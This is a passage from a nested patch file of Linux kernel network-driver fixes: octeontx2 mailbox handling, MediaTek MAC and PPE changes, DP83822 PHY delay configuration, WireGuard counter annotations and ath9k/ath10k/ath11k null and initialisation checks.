+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++	num_msgs = rsp_hdr->num_msgs;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 	pf = af_mbox->pfvf;
+ 
+-	for (id = 0; id < af_mbox->num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2_process_pfaf_mbox_msg(pf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+-		if (mdev->msgs_acked == (af_mbox->num_msgs - 1))
++		if (mdev->msgs_acked == (num_msgs - 1))
+ 			__otx2_mbox_reset(mbox, 0);
+ 		mdev->msgs_acked++;
+ 	}
+@@ -946,12 +934,14 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ 	int offset, id, devid = 0;
+ 	struct mbox_hdr *rsp_hdr;
+ 	struct mbox_msghdr *msg;
++	u16 num_msgs;
+ 
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++	num_msgs = rsp_hdr->num_msgs;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < af_mbox->up_num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 
+ 		devid = msg->pcifunc & RVU_PFVF_FUNC_MASK;
+@@ -960,10 +950,11 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ 			otx2_process_mbox_msg_up(pf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+ 	}
+-	if (devid) {
++	/* Forward to VF iff VFs are really present */
++	if (devid && pci_num_vf(pf->pdev)) {
+ 		otx2_forward_vf_mbox_msgs(pf, &pf->mbox.mbox_up,
+ 					  MBOX_DIR_PFVF_UP, devid - 1,
+-					  af_mbox->up_num_msgs);
++					  num_msgs);
+ 		return;
+ 	}
+ 
+@@ -973,16 +964,49 @@ static void otx2_pfaf_mbox_up_handler(struct work_struct *work)
+ static irqreturn_t otx2_pfaf_mbox_intr_handler(int irq, void *pf_irq)
+ {
+ 	struct otx2_nic *pf = (struct otx2_nic *)pf_irq;
+-	struct mbox *mbox;
++	struct mbox *mw = &pf->mbox;
++	struct otx2_mbox_dev *mdev;
++	struct otx2_mbox *mbox;
++	struct mbox_hdr *hdr;
++	u64 mbox_data;
+ 
+ 	/* Clear the IRQ */
+ 	otx2_write64(pf, RVU_PF_INT, BIT_ULL(0));
+ 
+-	mbox = &pf->mbox;
+ 
+-	trace_otx2_msg_interrupt(mbox->mbox.pdev, "AF to PF", BIT_ULL(0));
++	mbox_data = otx2_read64(pf, RVU_PF_PFAF_MBOX0);
++
++	if (mbox_data & MBOX_UP_MSG) {
++		mbox_data &= ~MBOX_UP_MSG;
++		otx2_write64(pf, RVU_PF_PFAF_MBOX0, mbox_data);
++
++		mbox = &mw->mbox_up;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(pf->mbox_wq, &mw->mbox_up_wrk);
++
++		trace_otx2_msg_interrupt(pf->pdev, "UP message from AF to PF",
++					 BIT_ULL(0));
++	}
++
++	if (mbox_data & MBOX_DOWN_MSG) {
++		mbox_data &= ~MBOX_DOWN_MSG;
++		otx2_write64(pf, RVU_PF_PFAF_MBOX0, mbox_data);
++
++		mbox = &mw->mbox;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(pf->mbox_wq, &mw->mbox_wrk);
+ 
+-	otx2_queue_work(mbox, pf->mbox_wq, 0, 1, 1, TYPE_PFAF);
++		trace_otx2_msg_interrupt(pf->pdev, "DOWN reply from AF to PF",
++					 BIT_ULL(0));
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -1063,9 +1087,8 @@ static int otx2_pfaf_mbox_init(struct otx2_nic *pf)
+ 	int err;
+ 
+ 	mbox->pfvf = pf;
+-	pf->mbox_wq = alloc_workqueue("otx2_pfaf_mailbox",
+-				      WQ_UNBOUND | WQ_HIGHPRI |
+-				      WQ_MEM_RECLAIM, 1);
++	pf->mbox_wq = alloc_ordered_workqueue("otx2_pfaf_mailbox",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!pf->mbox_wq)
+ 		return -ENOMEM;
+ 
+@@ -3030,6 +3053,7 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	struct otx2_vf_config *config;
+ 	struct cgx_link_info_msg *req;
+ 	struct mbox_msghdr *msghdr;
++	struct delayed_work *dwork;
+ 	struct otx2_nic *pf;
+ 	int vf_idx;
+ 
+@@ -3038,10 +3062,24 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	vf_idx = config - config->pf->vf_configs;
+ 	pf = config->pf;
+ 
++	if (config->intf_down)
++		return;
++
++	mutex_lock(&pf->mbox.lock);
++
++	dwork = &config->link_event_work;
++
++	if (!otx2_mbox_wait_for_zero(&pf->mbox_pfvf[0].mbox_up, vf_idx)) {
++		schedule_delayed_work(dwork, msecs_to_jiffies(100));
++		mutex_unlock(&pf->mbox.lock);
++		return;
++	}
++
+ 	msghdr = otx2_mbox_alloc_msg_rsp(&pf->mbox_pfvf[0].mbox_up, vf_idx,
+ 					 sizeof(*req), sizeof(struct msg_rsp));
+ 	if (!msghdr) {
+ 		dev_err(pf->dev, "Failed to create VF%d link event\n", vf_idx);
++		mutex_unlock(&pf->mbox.lock);
+ 		return;
+ 	}
+ 
+@@ -3050,7 +3088,11 @@ static void otx2_vf_link_event_task(struct work_struct *work)
+ 	req->hdr.sig = OTX2_MBOX_REQ_SIG;
+ 	memcpy(&req->link_info, &pf->linfo, sizeof(req->link_info));
+ 
++	otx2_mbox_wait_for_zero(&pf->mbox_pfvf[0].mbox_up, vf_idx);
++
+ 	otx2_sync_mbox_up_msg(&pf->mbox_pfvf[0], vf_idx);
++
++	mutex_unlock(&pf->mbox.lock);
+ }
+ 
+ static int otx2_sriov_enable(struct pci_dev *pdev, int numvfs)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index 404855bccb4b6..dcb8190de2407 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -89,16 +89,20 @@ static void otx2vf_vfaf_mbox_handler(struct work_struct *work)
+ 	struct otx2_mbox *mbox;
+ 	struct mbox *af_mbox;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	af_mbox = container_of(work, struct mbox, mbox_wrk);
+ 	mbox = &af_mbox->mbox;
+ 	mdev = &mbox->dev[0];
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (af_mbox->num_msgs == 0)
++	num_msgs = rsp_hdr->num_msgs;
++
++	if (num_msgs == 0)
+ 		return;
++
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < af_mbox->num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2vf_process_vfaf_mbox_msg(af_mbox->pfvf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+@@ -151,6 +155,7 @@ static void otx2vf_vfaf_mbox_up_handler(struct work_struct *work)
+ 	struct mbox *vf_mbox;
+ 	struct otx2_nic *vf;
+ 	int offset, id;
++	u16 num_msgs;
+ 
+ 	vf_mbox = container_of(work, struct mbox, mbox_up_wrk);
+ 	vf = vf_mbox->pfvf;
+@@ -158,12 +163,14 @@ static void otx2vf_vfaf_mbox_up_handler(struct work_struct *work)
+ 	mdev = &mbox->dev[0];
+ 
+ 	rsp_hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (vf_mbox->up_num_msgs == 0)
++	num_msgs = rsp_hdr->num_msgs;
++
++	if (num_msgs == 0)
+ 		return;
+ 
+ 	offset = mbox->rx_start + ALIGN(sizeof(*rsp_hdr), MBOX_MSG_ALIGN);
+ 
+-	for (id = 0; id < vf_mbox->up_num_msgs; id++) {
++	for (id = 0; id < num_msgs; id++) {
+ 		msg = (struct mbox_msghdr *)(mdev->mbase + offset);
+ 		otx2vf_process_mbox_msg_up(vf, msg);
+ 		offset = mbox->rx_start + msg->next_msgoff;
+@@ -178,40 +185,48 @@ static irqreturn_t otx2vf_vfaf_mbox_intr_handler(int irq, void *vf_irq)
+ 	struct otx2_mbox_dev *mdev;
+ 	struct otx2_mbox *mbox;
+ 	struct mbox_hdr *hdr;
++	u64 mbox_data;
+ 
+ 	/* Clear the IRQ */
+ 	otx2_write64(vf, RVU_VF_INT, BIT_ULL(0));
+ 
++	mbox_data = otx2_read64(vf, RVU_VF_VFPF_MBOX0);
++
+ 	/* Read latest mbox data */
+ 	smp_rmb();
+ 
+-	/* Check for PF => VF response messages */
+-	mbox = &vf->mbox.mbox;
+-	mdev = &mbox->dev[0];
+-	otx2_sync_mbox_bbuf(mbox, 0);
++	if (mbox_data & MBOX_DOWN_MSG) {
++		mbox_data &= ~MBOX_DOWN_MSG;
++		otx2_write64(vf, RVU_VF_VFPF_MBOX0, mbox_data);
+ 
+-	trace_otx2_msg_interrupt(mbox->pdev, "PF to VF", BIT_ULL(0));
++		/* Check for PF => VF response messages */
++		mbox = &vf->mbox.mbox;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
+ 
+-	hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (hdr->num_msgs) {
+-		vf->mbox.num_msgs = hdr->num_msgs;
+-		hdr->num_msgs = 0;
+-		memset(mbox->hwbase + mbox->rx_start, 0,
+-		       ALIGN(sizeof(struct mbox_hdr), sizeof(u64)));
+-		queue_work(vf->mbox_wq, &vf->mbox.mbox_wrk);
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(vf->mbox_wq, &vf->mbox.mbox_wrk);
++
++		trace_otx2_msg_interrupt(mbox->pdev, "DOWN reply from PF to VF",
++					 BIT_ULL(0));
+ 	}
+-	/* Check for PF => VF notification messages */
+-	mbox = &vf->mbox.mbox_up;
+-	mdev = &mbox->dev[0];
+-	otx2_sync_mbox_bbuf(mbox, 0);
+ 
+-	hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
+-	if (hdr->num_msgs) {
+-		vf->mbox.up_num_msgs = hdr->num_msgs;
+-		hdr->num_msgs = 0;
+-		memset(mbox->hwbase + mbox->rx_start, 0,
+-		       ALIGN(sizeof(struct mbox_hdr), sizeof(u64)));
+-		queue_work(vf->mbox_wq, &vf->mbox.mbox_up_wrk);
++	if (mbox_data & MBOX_UP_MSG) {
++		mbox_data &= ~MBOX_UP_MSG;
++		otx2_write64(vf, RVU_VF_VFPF_MBOX0, mbox_data);
++
++		/* Check for PF => VF notification messages */
++		mbox = &vf->mbox.mbox_up;
++		mdev = &mbox->dev[0];
++		otx2_sync_mbox_bbuf(mbox, 0);
++
++		hdr = (struct mbox_hdr *)(mdev->mbase + mbox->rx_start);
++		if (hdr->num_msgs)
++			queue_work(vf->mbox_wq, &vf->mbox.mbox_up_wrk);
++
++		trace_otx2_msg_interrupt(mbox->pdev, "UP message from PF to VF",
++					 BIT_ULL(0));
+ 	}
+ 
+ 	return IRQ_HANDLED;
+@@ -293,9 +308,8 @@ static int otx2vf_vfaf_mbox_init(struct otx2_nic *vf)
+ 	int err;
+ 
+ 	mbox->pfvf = vf;
+-	vf->mbox_wq = alloc_workqueue("otx2_vfaf_mailbox",
+-				      WQ_UNBOUND | WQ_HIGHPRI |
+-				      WQ_MEM_RECLAIM, 1);
++	vf->mbox_wq = alloc_ordered_workqueue("otx2_vfaf_mailbox",
++					      WQ_HIGHPRI | WQ_MEM_RECLAIM);
+ 	if (!vf->mbox_wq)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 17e6ac4445afc..fecf3dd22dfaa 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -561,8 +561,7 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
+-		   MAC_MCR_RX_FIFO_CLR_DIS;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+@@ -610,7 +609,7 @@ static void mtk_mac_link_down(struct phylink_config *config, unsigned int mode,
+ 					   phylink_config);
+ 	u32 mcr = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 
+-	mcr &= ~(MAC_MCR_TX_EN | MAC_MCR_RX_EN);
++	mcr &= ~(MAC_MCR_TX_EN | MAC_MCR_RX_EN | MAC_MCR_FORCE_LINK);
+ 	mtk_w32(mac->hw, mcr, MTK_MAC_MCR(mac->id));
+ }
+ 
+@@ -649,7 +648,7 @@ static void mtk_mac_link_up(struct phylink_config *config,
+ 	if (rx_pause)
+ 		mcr |= MAC_MCR_FORCE_RX_FC;
+ 
+-	mcr |= MAC_MCR_TX_EN | MAC_MCR_RX_EN;
++	mcr |= MAC_MCR_TX_EN | MAC_MCR_RX_EN | MAC_MCR_FORCE_LINK;
+ 	mtk_w32(mac->hw, mcr, MTK_MAC_MCR(mac->id));
+ }
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_ppe.c b/drivers/net/ethernet/mediatek/mtk_ppe.c
+index d6eed204574a9..c64211e22ae70 100644
+--- a/drivers/net/ethernet/mediatek/mtk_ppe.c
++++ b/drivers/net/ethernet/mediatek/mtk_ppe.c
+@@ -811,7 +811,7 @@ void mtk_ppe_start(struct mtk_ppe *ppe)
+ 			 MTK_PPE_KEEPALIVE_DISABLE) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_HASH_MODE, 1) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_SCAN_MODE,
+-			 MTK_PPE_SCAN_MODE_KEEPALIVE_AGE) |
++			 MTK_PPE_SCAN_MODE_CHECK_AGE) |
+ 	      FIELD_PREP(MTK_PPE_TB_CFG_ENTRY_NUM,
+ 			 MTK_PPE_ENTRIES_SHIFT);
+ 	if (MTK_HAS_CAPS(ppe->eth->soc->caps, MTK_NETSYS_V2))
+@@ -895,17 +895,21 @@ int mtk_ppe_stop(struct mtk_ppe *ppe)
+ 
+ 	mtk_ppe_cache_enable(ppe, false);
+ 
+-	/* disable offload engine */
+-	ppe_clear(ppe, MTK_PPE_GLO_CFG, MTK_PPE_GLO_CFG_EN);
+-	ppe_w32(ppe, MTK_PPE_FLOW_CFG, 0);
+-
+ 	/* disable aging */
+ 	val = MTK_PPE_TB_CFG_AGE_NON_L4 |
+ 	      MTK_PPE_TB_CFG_AGE_UNBIND |
+ 	      MTK_PPE_TB_CFG_AGE_TCP |
+ 	      MTK_PPE_TB_CFG_AGE_UDP |
+-	      MTK_PPE_TB_CFG_AGE_TCP_FIN;
++	      MTK_PPE_TB_CFG_AGE_TCP_FIN |
++		  MTK_PPE_TB_CFG_SCAN_MODE;
+ 	ppe_clear(ppe, MTK_PPE_TB_CFG, val);
+ 
+-	return mtk_ppe_wait_busy(ppe);
++	if (mtk_ppe_wait_busy(ppe))
++		return -ETIMEDOUT;
++
++	/* disable offload engine */
++	ppe_clear(ppe, MTK_PPE_GLO_CFG, MTK_PPE_GLO_CFG_EN);
++	ppe_w32(ppe, MTK_PPE_FLOW_CFG, 0);
++
++	return 0;
+ }
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c b/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
+index e92860e20a24a..c6a2c302a8c8b 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/lag_conf.c
+@@ -308,6 +308,11 @@ static void nfp_fl_lag_do_work(struct work_struct *work)
+ 
+ 		acti_netdevs = kmalloc_array(entry->slave_cnt,
+ 					     sizeof(*acti_netdevs), GFP_KERNEL);
++		if (!acti_netdevs) {
++			schedule_delayed_work(&lag->work,
++					      NFP_FL_LAG_DELAY);
++			continue;
++		}
+ 
+ 		/* Include sanity check in the loop. It may be that a bond has
+ 		 * changed between processing the last notification and the
+diff --git a/drivers/net/phy/dp83822.c b/drivers/net/phy/dp83822.c
+index 267e6fd3d4448..57411ee1d8374 100644
+--- a/drivers/net/phy/dp83822.c
++++ b/drivers/net/phy/dp83822.c
+@@ -380,7 +380,7 @@ static int dp83822_config_init(struct phy_device *phydev)
+ {
+ 	struct dp83822_private *dp83822 = phydev->priv;
+ 	struct device *dev = &phydev->mdio.dev;
+-	int rgmii_delay;
++	int rgmii_delay = 0;
+ 	s32 rx_int_delay;
+ 	s32 tx_int_delay;
+ 	int err = 0;
+@@ -390,30 +390,33 @@ static int dp83822_config_init(struct phy_device *phydev)
+ 		rx_int_delay = phy_get_internal_delay(phydev, dev, NULL, 0,
+ 						      true);
+ 
+-		if (rx_int_delay <= 0)
+-			rgmii_delay = 0;
+-		else
+-			rgmii_delay = DP83822_RX_CLK_SHIFT;
++		/* Set DP83822_RX_CLK_SHIFT to enable rx clk internal delay */
++		if (rx_int_delay > 0)
++			rgmii_delay |= DP83822_RX_CLK_SHIFT;
+ 
+ 		tx_int_delay = phy_get_internal_delay(phydev, dev, NULL, 0,
+ 						      false);
++
++		/* Set DP83822_TX_CLK_SHIFT to disable tx clk internal delay */
+ 		if (tx_int_delay <= 0)
+-			rgmii_delay &= ~DP83822_TX_CLK_SHIFT;
+-		else
+ 			rgmii_delay |= DP83822_TX_CLK_SHIFT;
+ 
+-		if (rgmii_delay) {
+-			err = phy_set_bits_mmd(phydev, DP83822_DEVADDR,
+-					       MII_DP83822_RCSR, rgmii_delay);
+-			if (err)
+-				return err;
+-		}
++		err = phy_modify_mmd(phydev, DP83822_DEVADDR, MII_DP83822_RCSR,
++				     DP83822_RX_CLK_SHIFT | DP83822_TX_CLK_SHIFT, rgmii_delay);
++		if (err)
++			return err;
++
++		err = phy_set_bits_mmd(phydev, DP83822_DEVADDR,
++				       MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
+ 
+-		phy_set_bits_mmd(phydev, DP83822_DEVADDR,
+-					MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++		if (err)
++			return err;
+ 	} else {
+-		phy_clear_bits_mmd(phydev, DP83822_DEVADDR,
+-					MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++		err = phy_clear_bits_mmd(phydev, DP83822_DEVADDR,
++					 MII_DP83822_RCSR, DP83822_RGMII_MODE_EN);
++
++		if (err)
++			return err;
+ 	}
+ 
+ 	if (dp83822->fx_enabled) {
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 944f76e6fc8eb..f25b0d338ca8d 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -2640,8 +2640,8 @@ EXPORT_SYMBOL(genphy_resume);
+ int genphy_loopback(struct phy_device *phydev, bool enable)
+ {
+ 	if (enable) {
+-		u16 val, ctl = BMCR_LOOPBACK;
+-		int ret;
++		u16 ctl = BMCR_LOOPBACK;
++		int ret, val;
+ 
+ 		ctl |= mii_bmcr_encode_fixed(phydev->speed, phydev->duplex);
+ 
+@@ -2893,7 +2893,7 @@ s32 phy_get_internal_delay(struct phy_device *phydev, struct device *dev,
+ 	if (delay < 0)
+ 		return delay;
+ 
+-	if (delay && size == 0)
++	if (size == 0)
+ 		return delay;
+ 
+ 	if (delay < delay_values[0] || delay > delay_values[size - 1]) {
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index a530f20ee2575..2fa46baa589e5 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -2104,6 +2104,11 @@ static const struct usb_device_id products[] = {
+ 		USB_DEVICE(0x0424, 0x9E08),
+ 		.driver_info = (unsigned long) &smsc95xx_info,
+ 	},
++	{
++		/* SYSTEC USB-SPEmodule1 10BASE-T1L Ethernet Device */
++		USB_DEVICE(0x0878, 0x1400),
++		.driver_info = (unsigned long)&smsc95xx_info,
++	},
+ 	{
+ 		/* Microchip's EVB-LAN8670-USB 10BASE-T1S Ethernet Device */
+ 		USB_DEVICE(0x184F, 0x0051),
+diff --git a/drivers/net/usb/sr9800.c b/drivers/net/usb/sr9800.c
+index f5e19f3ef6cdd..4de5144821835 100644
+--- a/drivers/net/usb/sr9800.c
++++ b/drivers/net/usb/sr9800.c
+@@ -737,7 +737,9 @@ static int sr9800_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	data->eeprom_len = SR9800_EEPROM_LEN;
+ 
+-	usbnet_get_endpoints(dev, intf);
++	ret = usbnet_get_endpoints(dev, intf);
++	if (ret)
++		goto out;
+ 
+ 	/* LED Setting Rule :
+ 	 * AABB:CCDD
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index dd9f5f1461921..8dcd3b6e143b9 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -1444,8 +1444,6 @@ static netdev_features_t veth_fix_features(struct net_device *dev,
+ 		if (peer_priv->_xdp_prog)
+ 			features &= ~NETIF_F_GSO_SOFTWARE;
+ 	}
+-	if (priv->_xdp_prog)
+-		features |= NETIF_F_GRO;
+ 
+ 	return features;
+ }
+@@ -1542,14 +1540,6 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 		}
+ 
+ 		if (!old_prog) {
+-			if (!veth_gro_requested(dev)) {
+-				/* user-space did not require GRO, but adding
+-				 * XDP is supposed to get GRO working
+-				 */
+-				dev->features |= NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+-
+ 			peer->hw_features &= ~NETIF_F_GSO_SOFTWARE;
+ 			peer->max_mtu = max_mtu;
+ 		}
+@@ -1560,14 +1550,6 @@ static int veth_xdp_set(struct net_device *dev, struct bpf_prog *prog,
+ 			if (dev->flags & IFF_UP)
+ 				veth_disable_xdp(dev);
+ 
+-			/* if user-space did not require GRO, since adding XDP
+-			 * enabled it, clear it now
+-			 */
+-			if (!veth_gro_requested(dev)) {
+-				dev->features &= ~NETIF_F_GRO;
+-				netdev_features_change(dev);
+-			}
+-
+ 			if (peer) {
+ 				peer->hw_features |= NETIF_F_GSO_SOFTWARE;
+ 				peer->max_mtu = ETH_MAX_MTU;
+diff --git a/drivers/net/wireguard/receive.c b/drivers/net/wireguard/receive.c
+index a176653c88616..db01ec03bda00 100644
+--- a/drivers/net/wireguard/receive.c
++++ b/drivers/net/wireguard/receive.c
+@@ -251,7 +251,7 @@ static bool decrypt_packet(struct sk_buff *skb, struct noise_keypair *keypair)
+ 
+ 	if (unlikely(!READ_ONCE(keypair->receiving.is_valid) ||
+ 		  wg_birthdate_has_expired(keypair->receiving.birthdate, REJECT_AFTER_TIME) ||
+-		  keypair->receiving_counter.counter >= REJECT_AFTER_MESSAGES)) {
++		  READ_ONCE(keypair->receiving_counter.counter) >= REJECT_AFTER_MESSAGES)) {
+ 		WRITE_ONCE(keypair->receiving.is_valid, false);
+ 		return false;
+ 	}
+@@ -318,7 +318,7 @@ static bool counter_validate(struct noise_replay_counter *counter, u64 their_cou
+ 		for (i = 1; i <= top; ++i)
+ 			counter->backtrack[(i + index_current) &
+ 				((COUNTER_BITS_TOTAL / BITS_PER_LONG) - 1)] = 0;
+-		counter->counter = their_counter;
++		WRITE_ONCE(counter->counter, their_counter);
+ 	}
+ 
+ 	index &= (COUNTER_BITS_TOTAL / BITS_PER_LONG) - 1;
+@@ -463,7 +463,7 @@ int wg_packet_rx_poll(struct napi_struct *napi, int budget)
+ 			net_dbg_ratelimited("%s: Packet has invalid nonce %llu (max %llu)\n",
+ 					    peer->device->dev->name,
+ 					    PACKET_CB(skb)->nonce,
+-					    keypair->receiving_counter.counter);
++					    READ_ONCE(keypair->receiving_counter.counter));
+ 			goto next;
+ 		}
+ 
+diff --git a/drivers/net/wireless/ath/ath10k/wmi-tlv.c b/drivers/net/wireless/ath/ath10k/wmi-tlv.c
+index 876410a47d1d2..4d5009604eee7 100644
+--- a/drivers/net/wireless/ath/ath10k/wmi-tlv.c
++++ b/drivers/net/wireless/ath/ath10k/wmi-tlv.c
+@@ -844,6 +844,10 @@ ath10k_wmi_tlv_op_pull_mgmt_tx_compl_ev(struct ath10k *ar, struct sk_buff *skb,
+ 	}
+ 
+ 	ev = tb[WMI_TLV_TAG_STRUCT_MGMT_TX_COMPL_EVENT];
++	if (!ev) {
++		kfree(tb);
++		return -EPROTO;
++	}
+ 
+ 	arg->desc_id = ev->desc_id;
+ 	arg->status = ev->status;
+diff --git a/drivers/net/wireless/ath/ath11k/mac.c b/drivers/net/wireless/ath/ath11k/mac.c
+index 21c6b36dc6ebb..51fc77e93de5c 100644
+--- a/drivers/net/wireless/ath/ath11k/mac.c
++++ b/drivers/net/wireless/ath/ath11k/mac.c
+@@ -2112,6 +2112,8 @@ static void ath11k_peer_assoc_h_he(struct ath11k *ar,
+ 	mcs_160_map = le16_to_cpu(he_cap->he_mcs_nss_supp.rx_mcs_160);
+ 	mcs_80_map = le16_to_cpu(he_cap->he_mcs_nss_supp.rx_mcs_80);
+ 
++	/* Initialize rx_mcs_160 to 9 which is an invalid value */
++	rx_mcs_160 = 9;
+ 	if (support_160) {
+ 		for (i = 7; i >= 0; i--) {
+ 			u8 mcs_160 = (mcs_160_map >> (2 * i)) & 3;
+@@ -2123,6 +2125,8 @@ static void ath11k_peer_assoc_h_he(struct ath11k *ar,
+ 		}
+ 	}
+ 
++	/* Initialize rx_mcs_80 to 9 which is an invalid value */
++	rx_mcs_80 = 9;
+ 	for (i = 7; i >= 0; i--) {
+ 		u8 mcs_80 = (mcs_80_map >> (2 * i)) & 3;
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/htc.h b/drivers/net/wireless/ath/ath9k/htc.h
+index 237f4ec2cffd7..6c33e898b3000 100644
+--- a/drivers/net/wireless/ath/ath9k/htc.h
++++ b/drivers/net/wireless/ath/ath9k/htc.h
+@@ -306,7 +306,6 @@ struct ath9k_htc_tx {
+ 	DECLARE_BITMAP(tx_slot, MAX_TX_BUF_NUM);
+ 	struct timer_list cleanup_timer;
+ 	spinlock_t tx_lock;
+-	bool initialized;
+ };
+ 
+ struct ath9k_htc_tx_ctl {
+@@ -515,6 +514,7 @@ struct ath9k_htc_priv {
+ 	unsigned long ps_usecount;
+ 	bool ps_enabled;
+ 	bool ps_idle;
++	bool initialized;
+ 
+ #ifdef CONFIG_MAC80211_LEDS
+ 	enum led_brightness brightness;
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_init.c b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+index 96a3185a96d75..b014185373f34 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_init.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_init.c
+@@ -966,6 +966,10 @@ int ath9k_htc_probe_device(struct htc_target *htc_handle, struct device *dev,
+ 
+ 	htc_handle->drv_priv = priv;
+ 
++	/* Allow ath9k_wmi_event_tasklet() to operate. */
++	smp_wmb();
++	priv->initialized = true;
++
+ 	return 0;
+ 
+ err_init:
+diff --git a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+index d6a3f001dacb9..2fdd27885f543 100644
+--- a/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
++++ b/drivers/net/wireless/ath/ath9k/htc_drv_txrx.c
+@@ -815,10 +815,6 @@ int ath9k_tx_init(struct ath9k_htc_priv *priv)
+ 	skb_queue_head_init(&priv->tx.data_vo_queue);
+ 	skb_queue_head_init(&priv->tx.tx_failed);
+ 
+-	/* Allow ath9k_wmi_event_tasklet(WMI_TXSTATUS_EVENTID) to operate. */
+-	smp_wmb();
+-	priv->tx.initialized = true;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/net/wireless/ath/ath9k/wmi.c b/drivers/net/wireless/ath/ath9k/wmi.c
+index 1476b42b52a91..805ad31edba2b 100644
+--- a/drivers/net/wireless/ath/ath9k/wmi.c
++++ b/drivers/net/wireless/ath/ath9k/wmi.c
+@@ -155,6 +155,12 @@ void ath9k_wmi_event_tasklet(struct tasklet_struct *t)
+ 		}
+ 		spin_unlock_irqrestore(&wmi->wmi_lock, flags);
+ 
++		/* Check if ath9k_htc_probe_device() completed. */
++		if (!data_race(priv->initialized)) {
++			kfree_skb(skb);
++			continue;
++		}
++
+ 		hdr = (struct wmi_cmd_hdr *) skb->data;
+ 		cmd_id = be16_to_cpu(hdr->command_id);
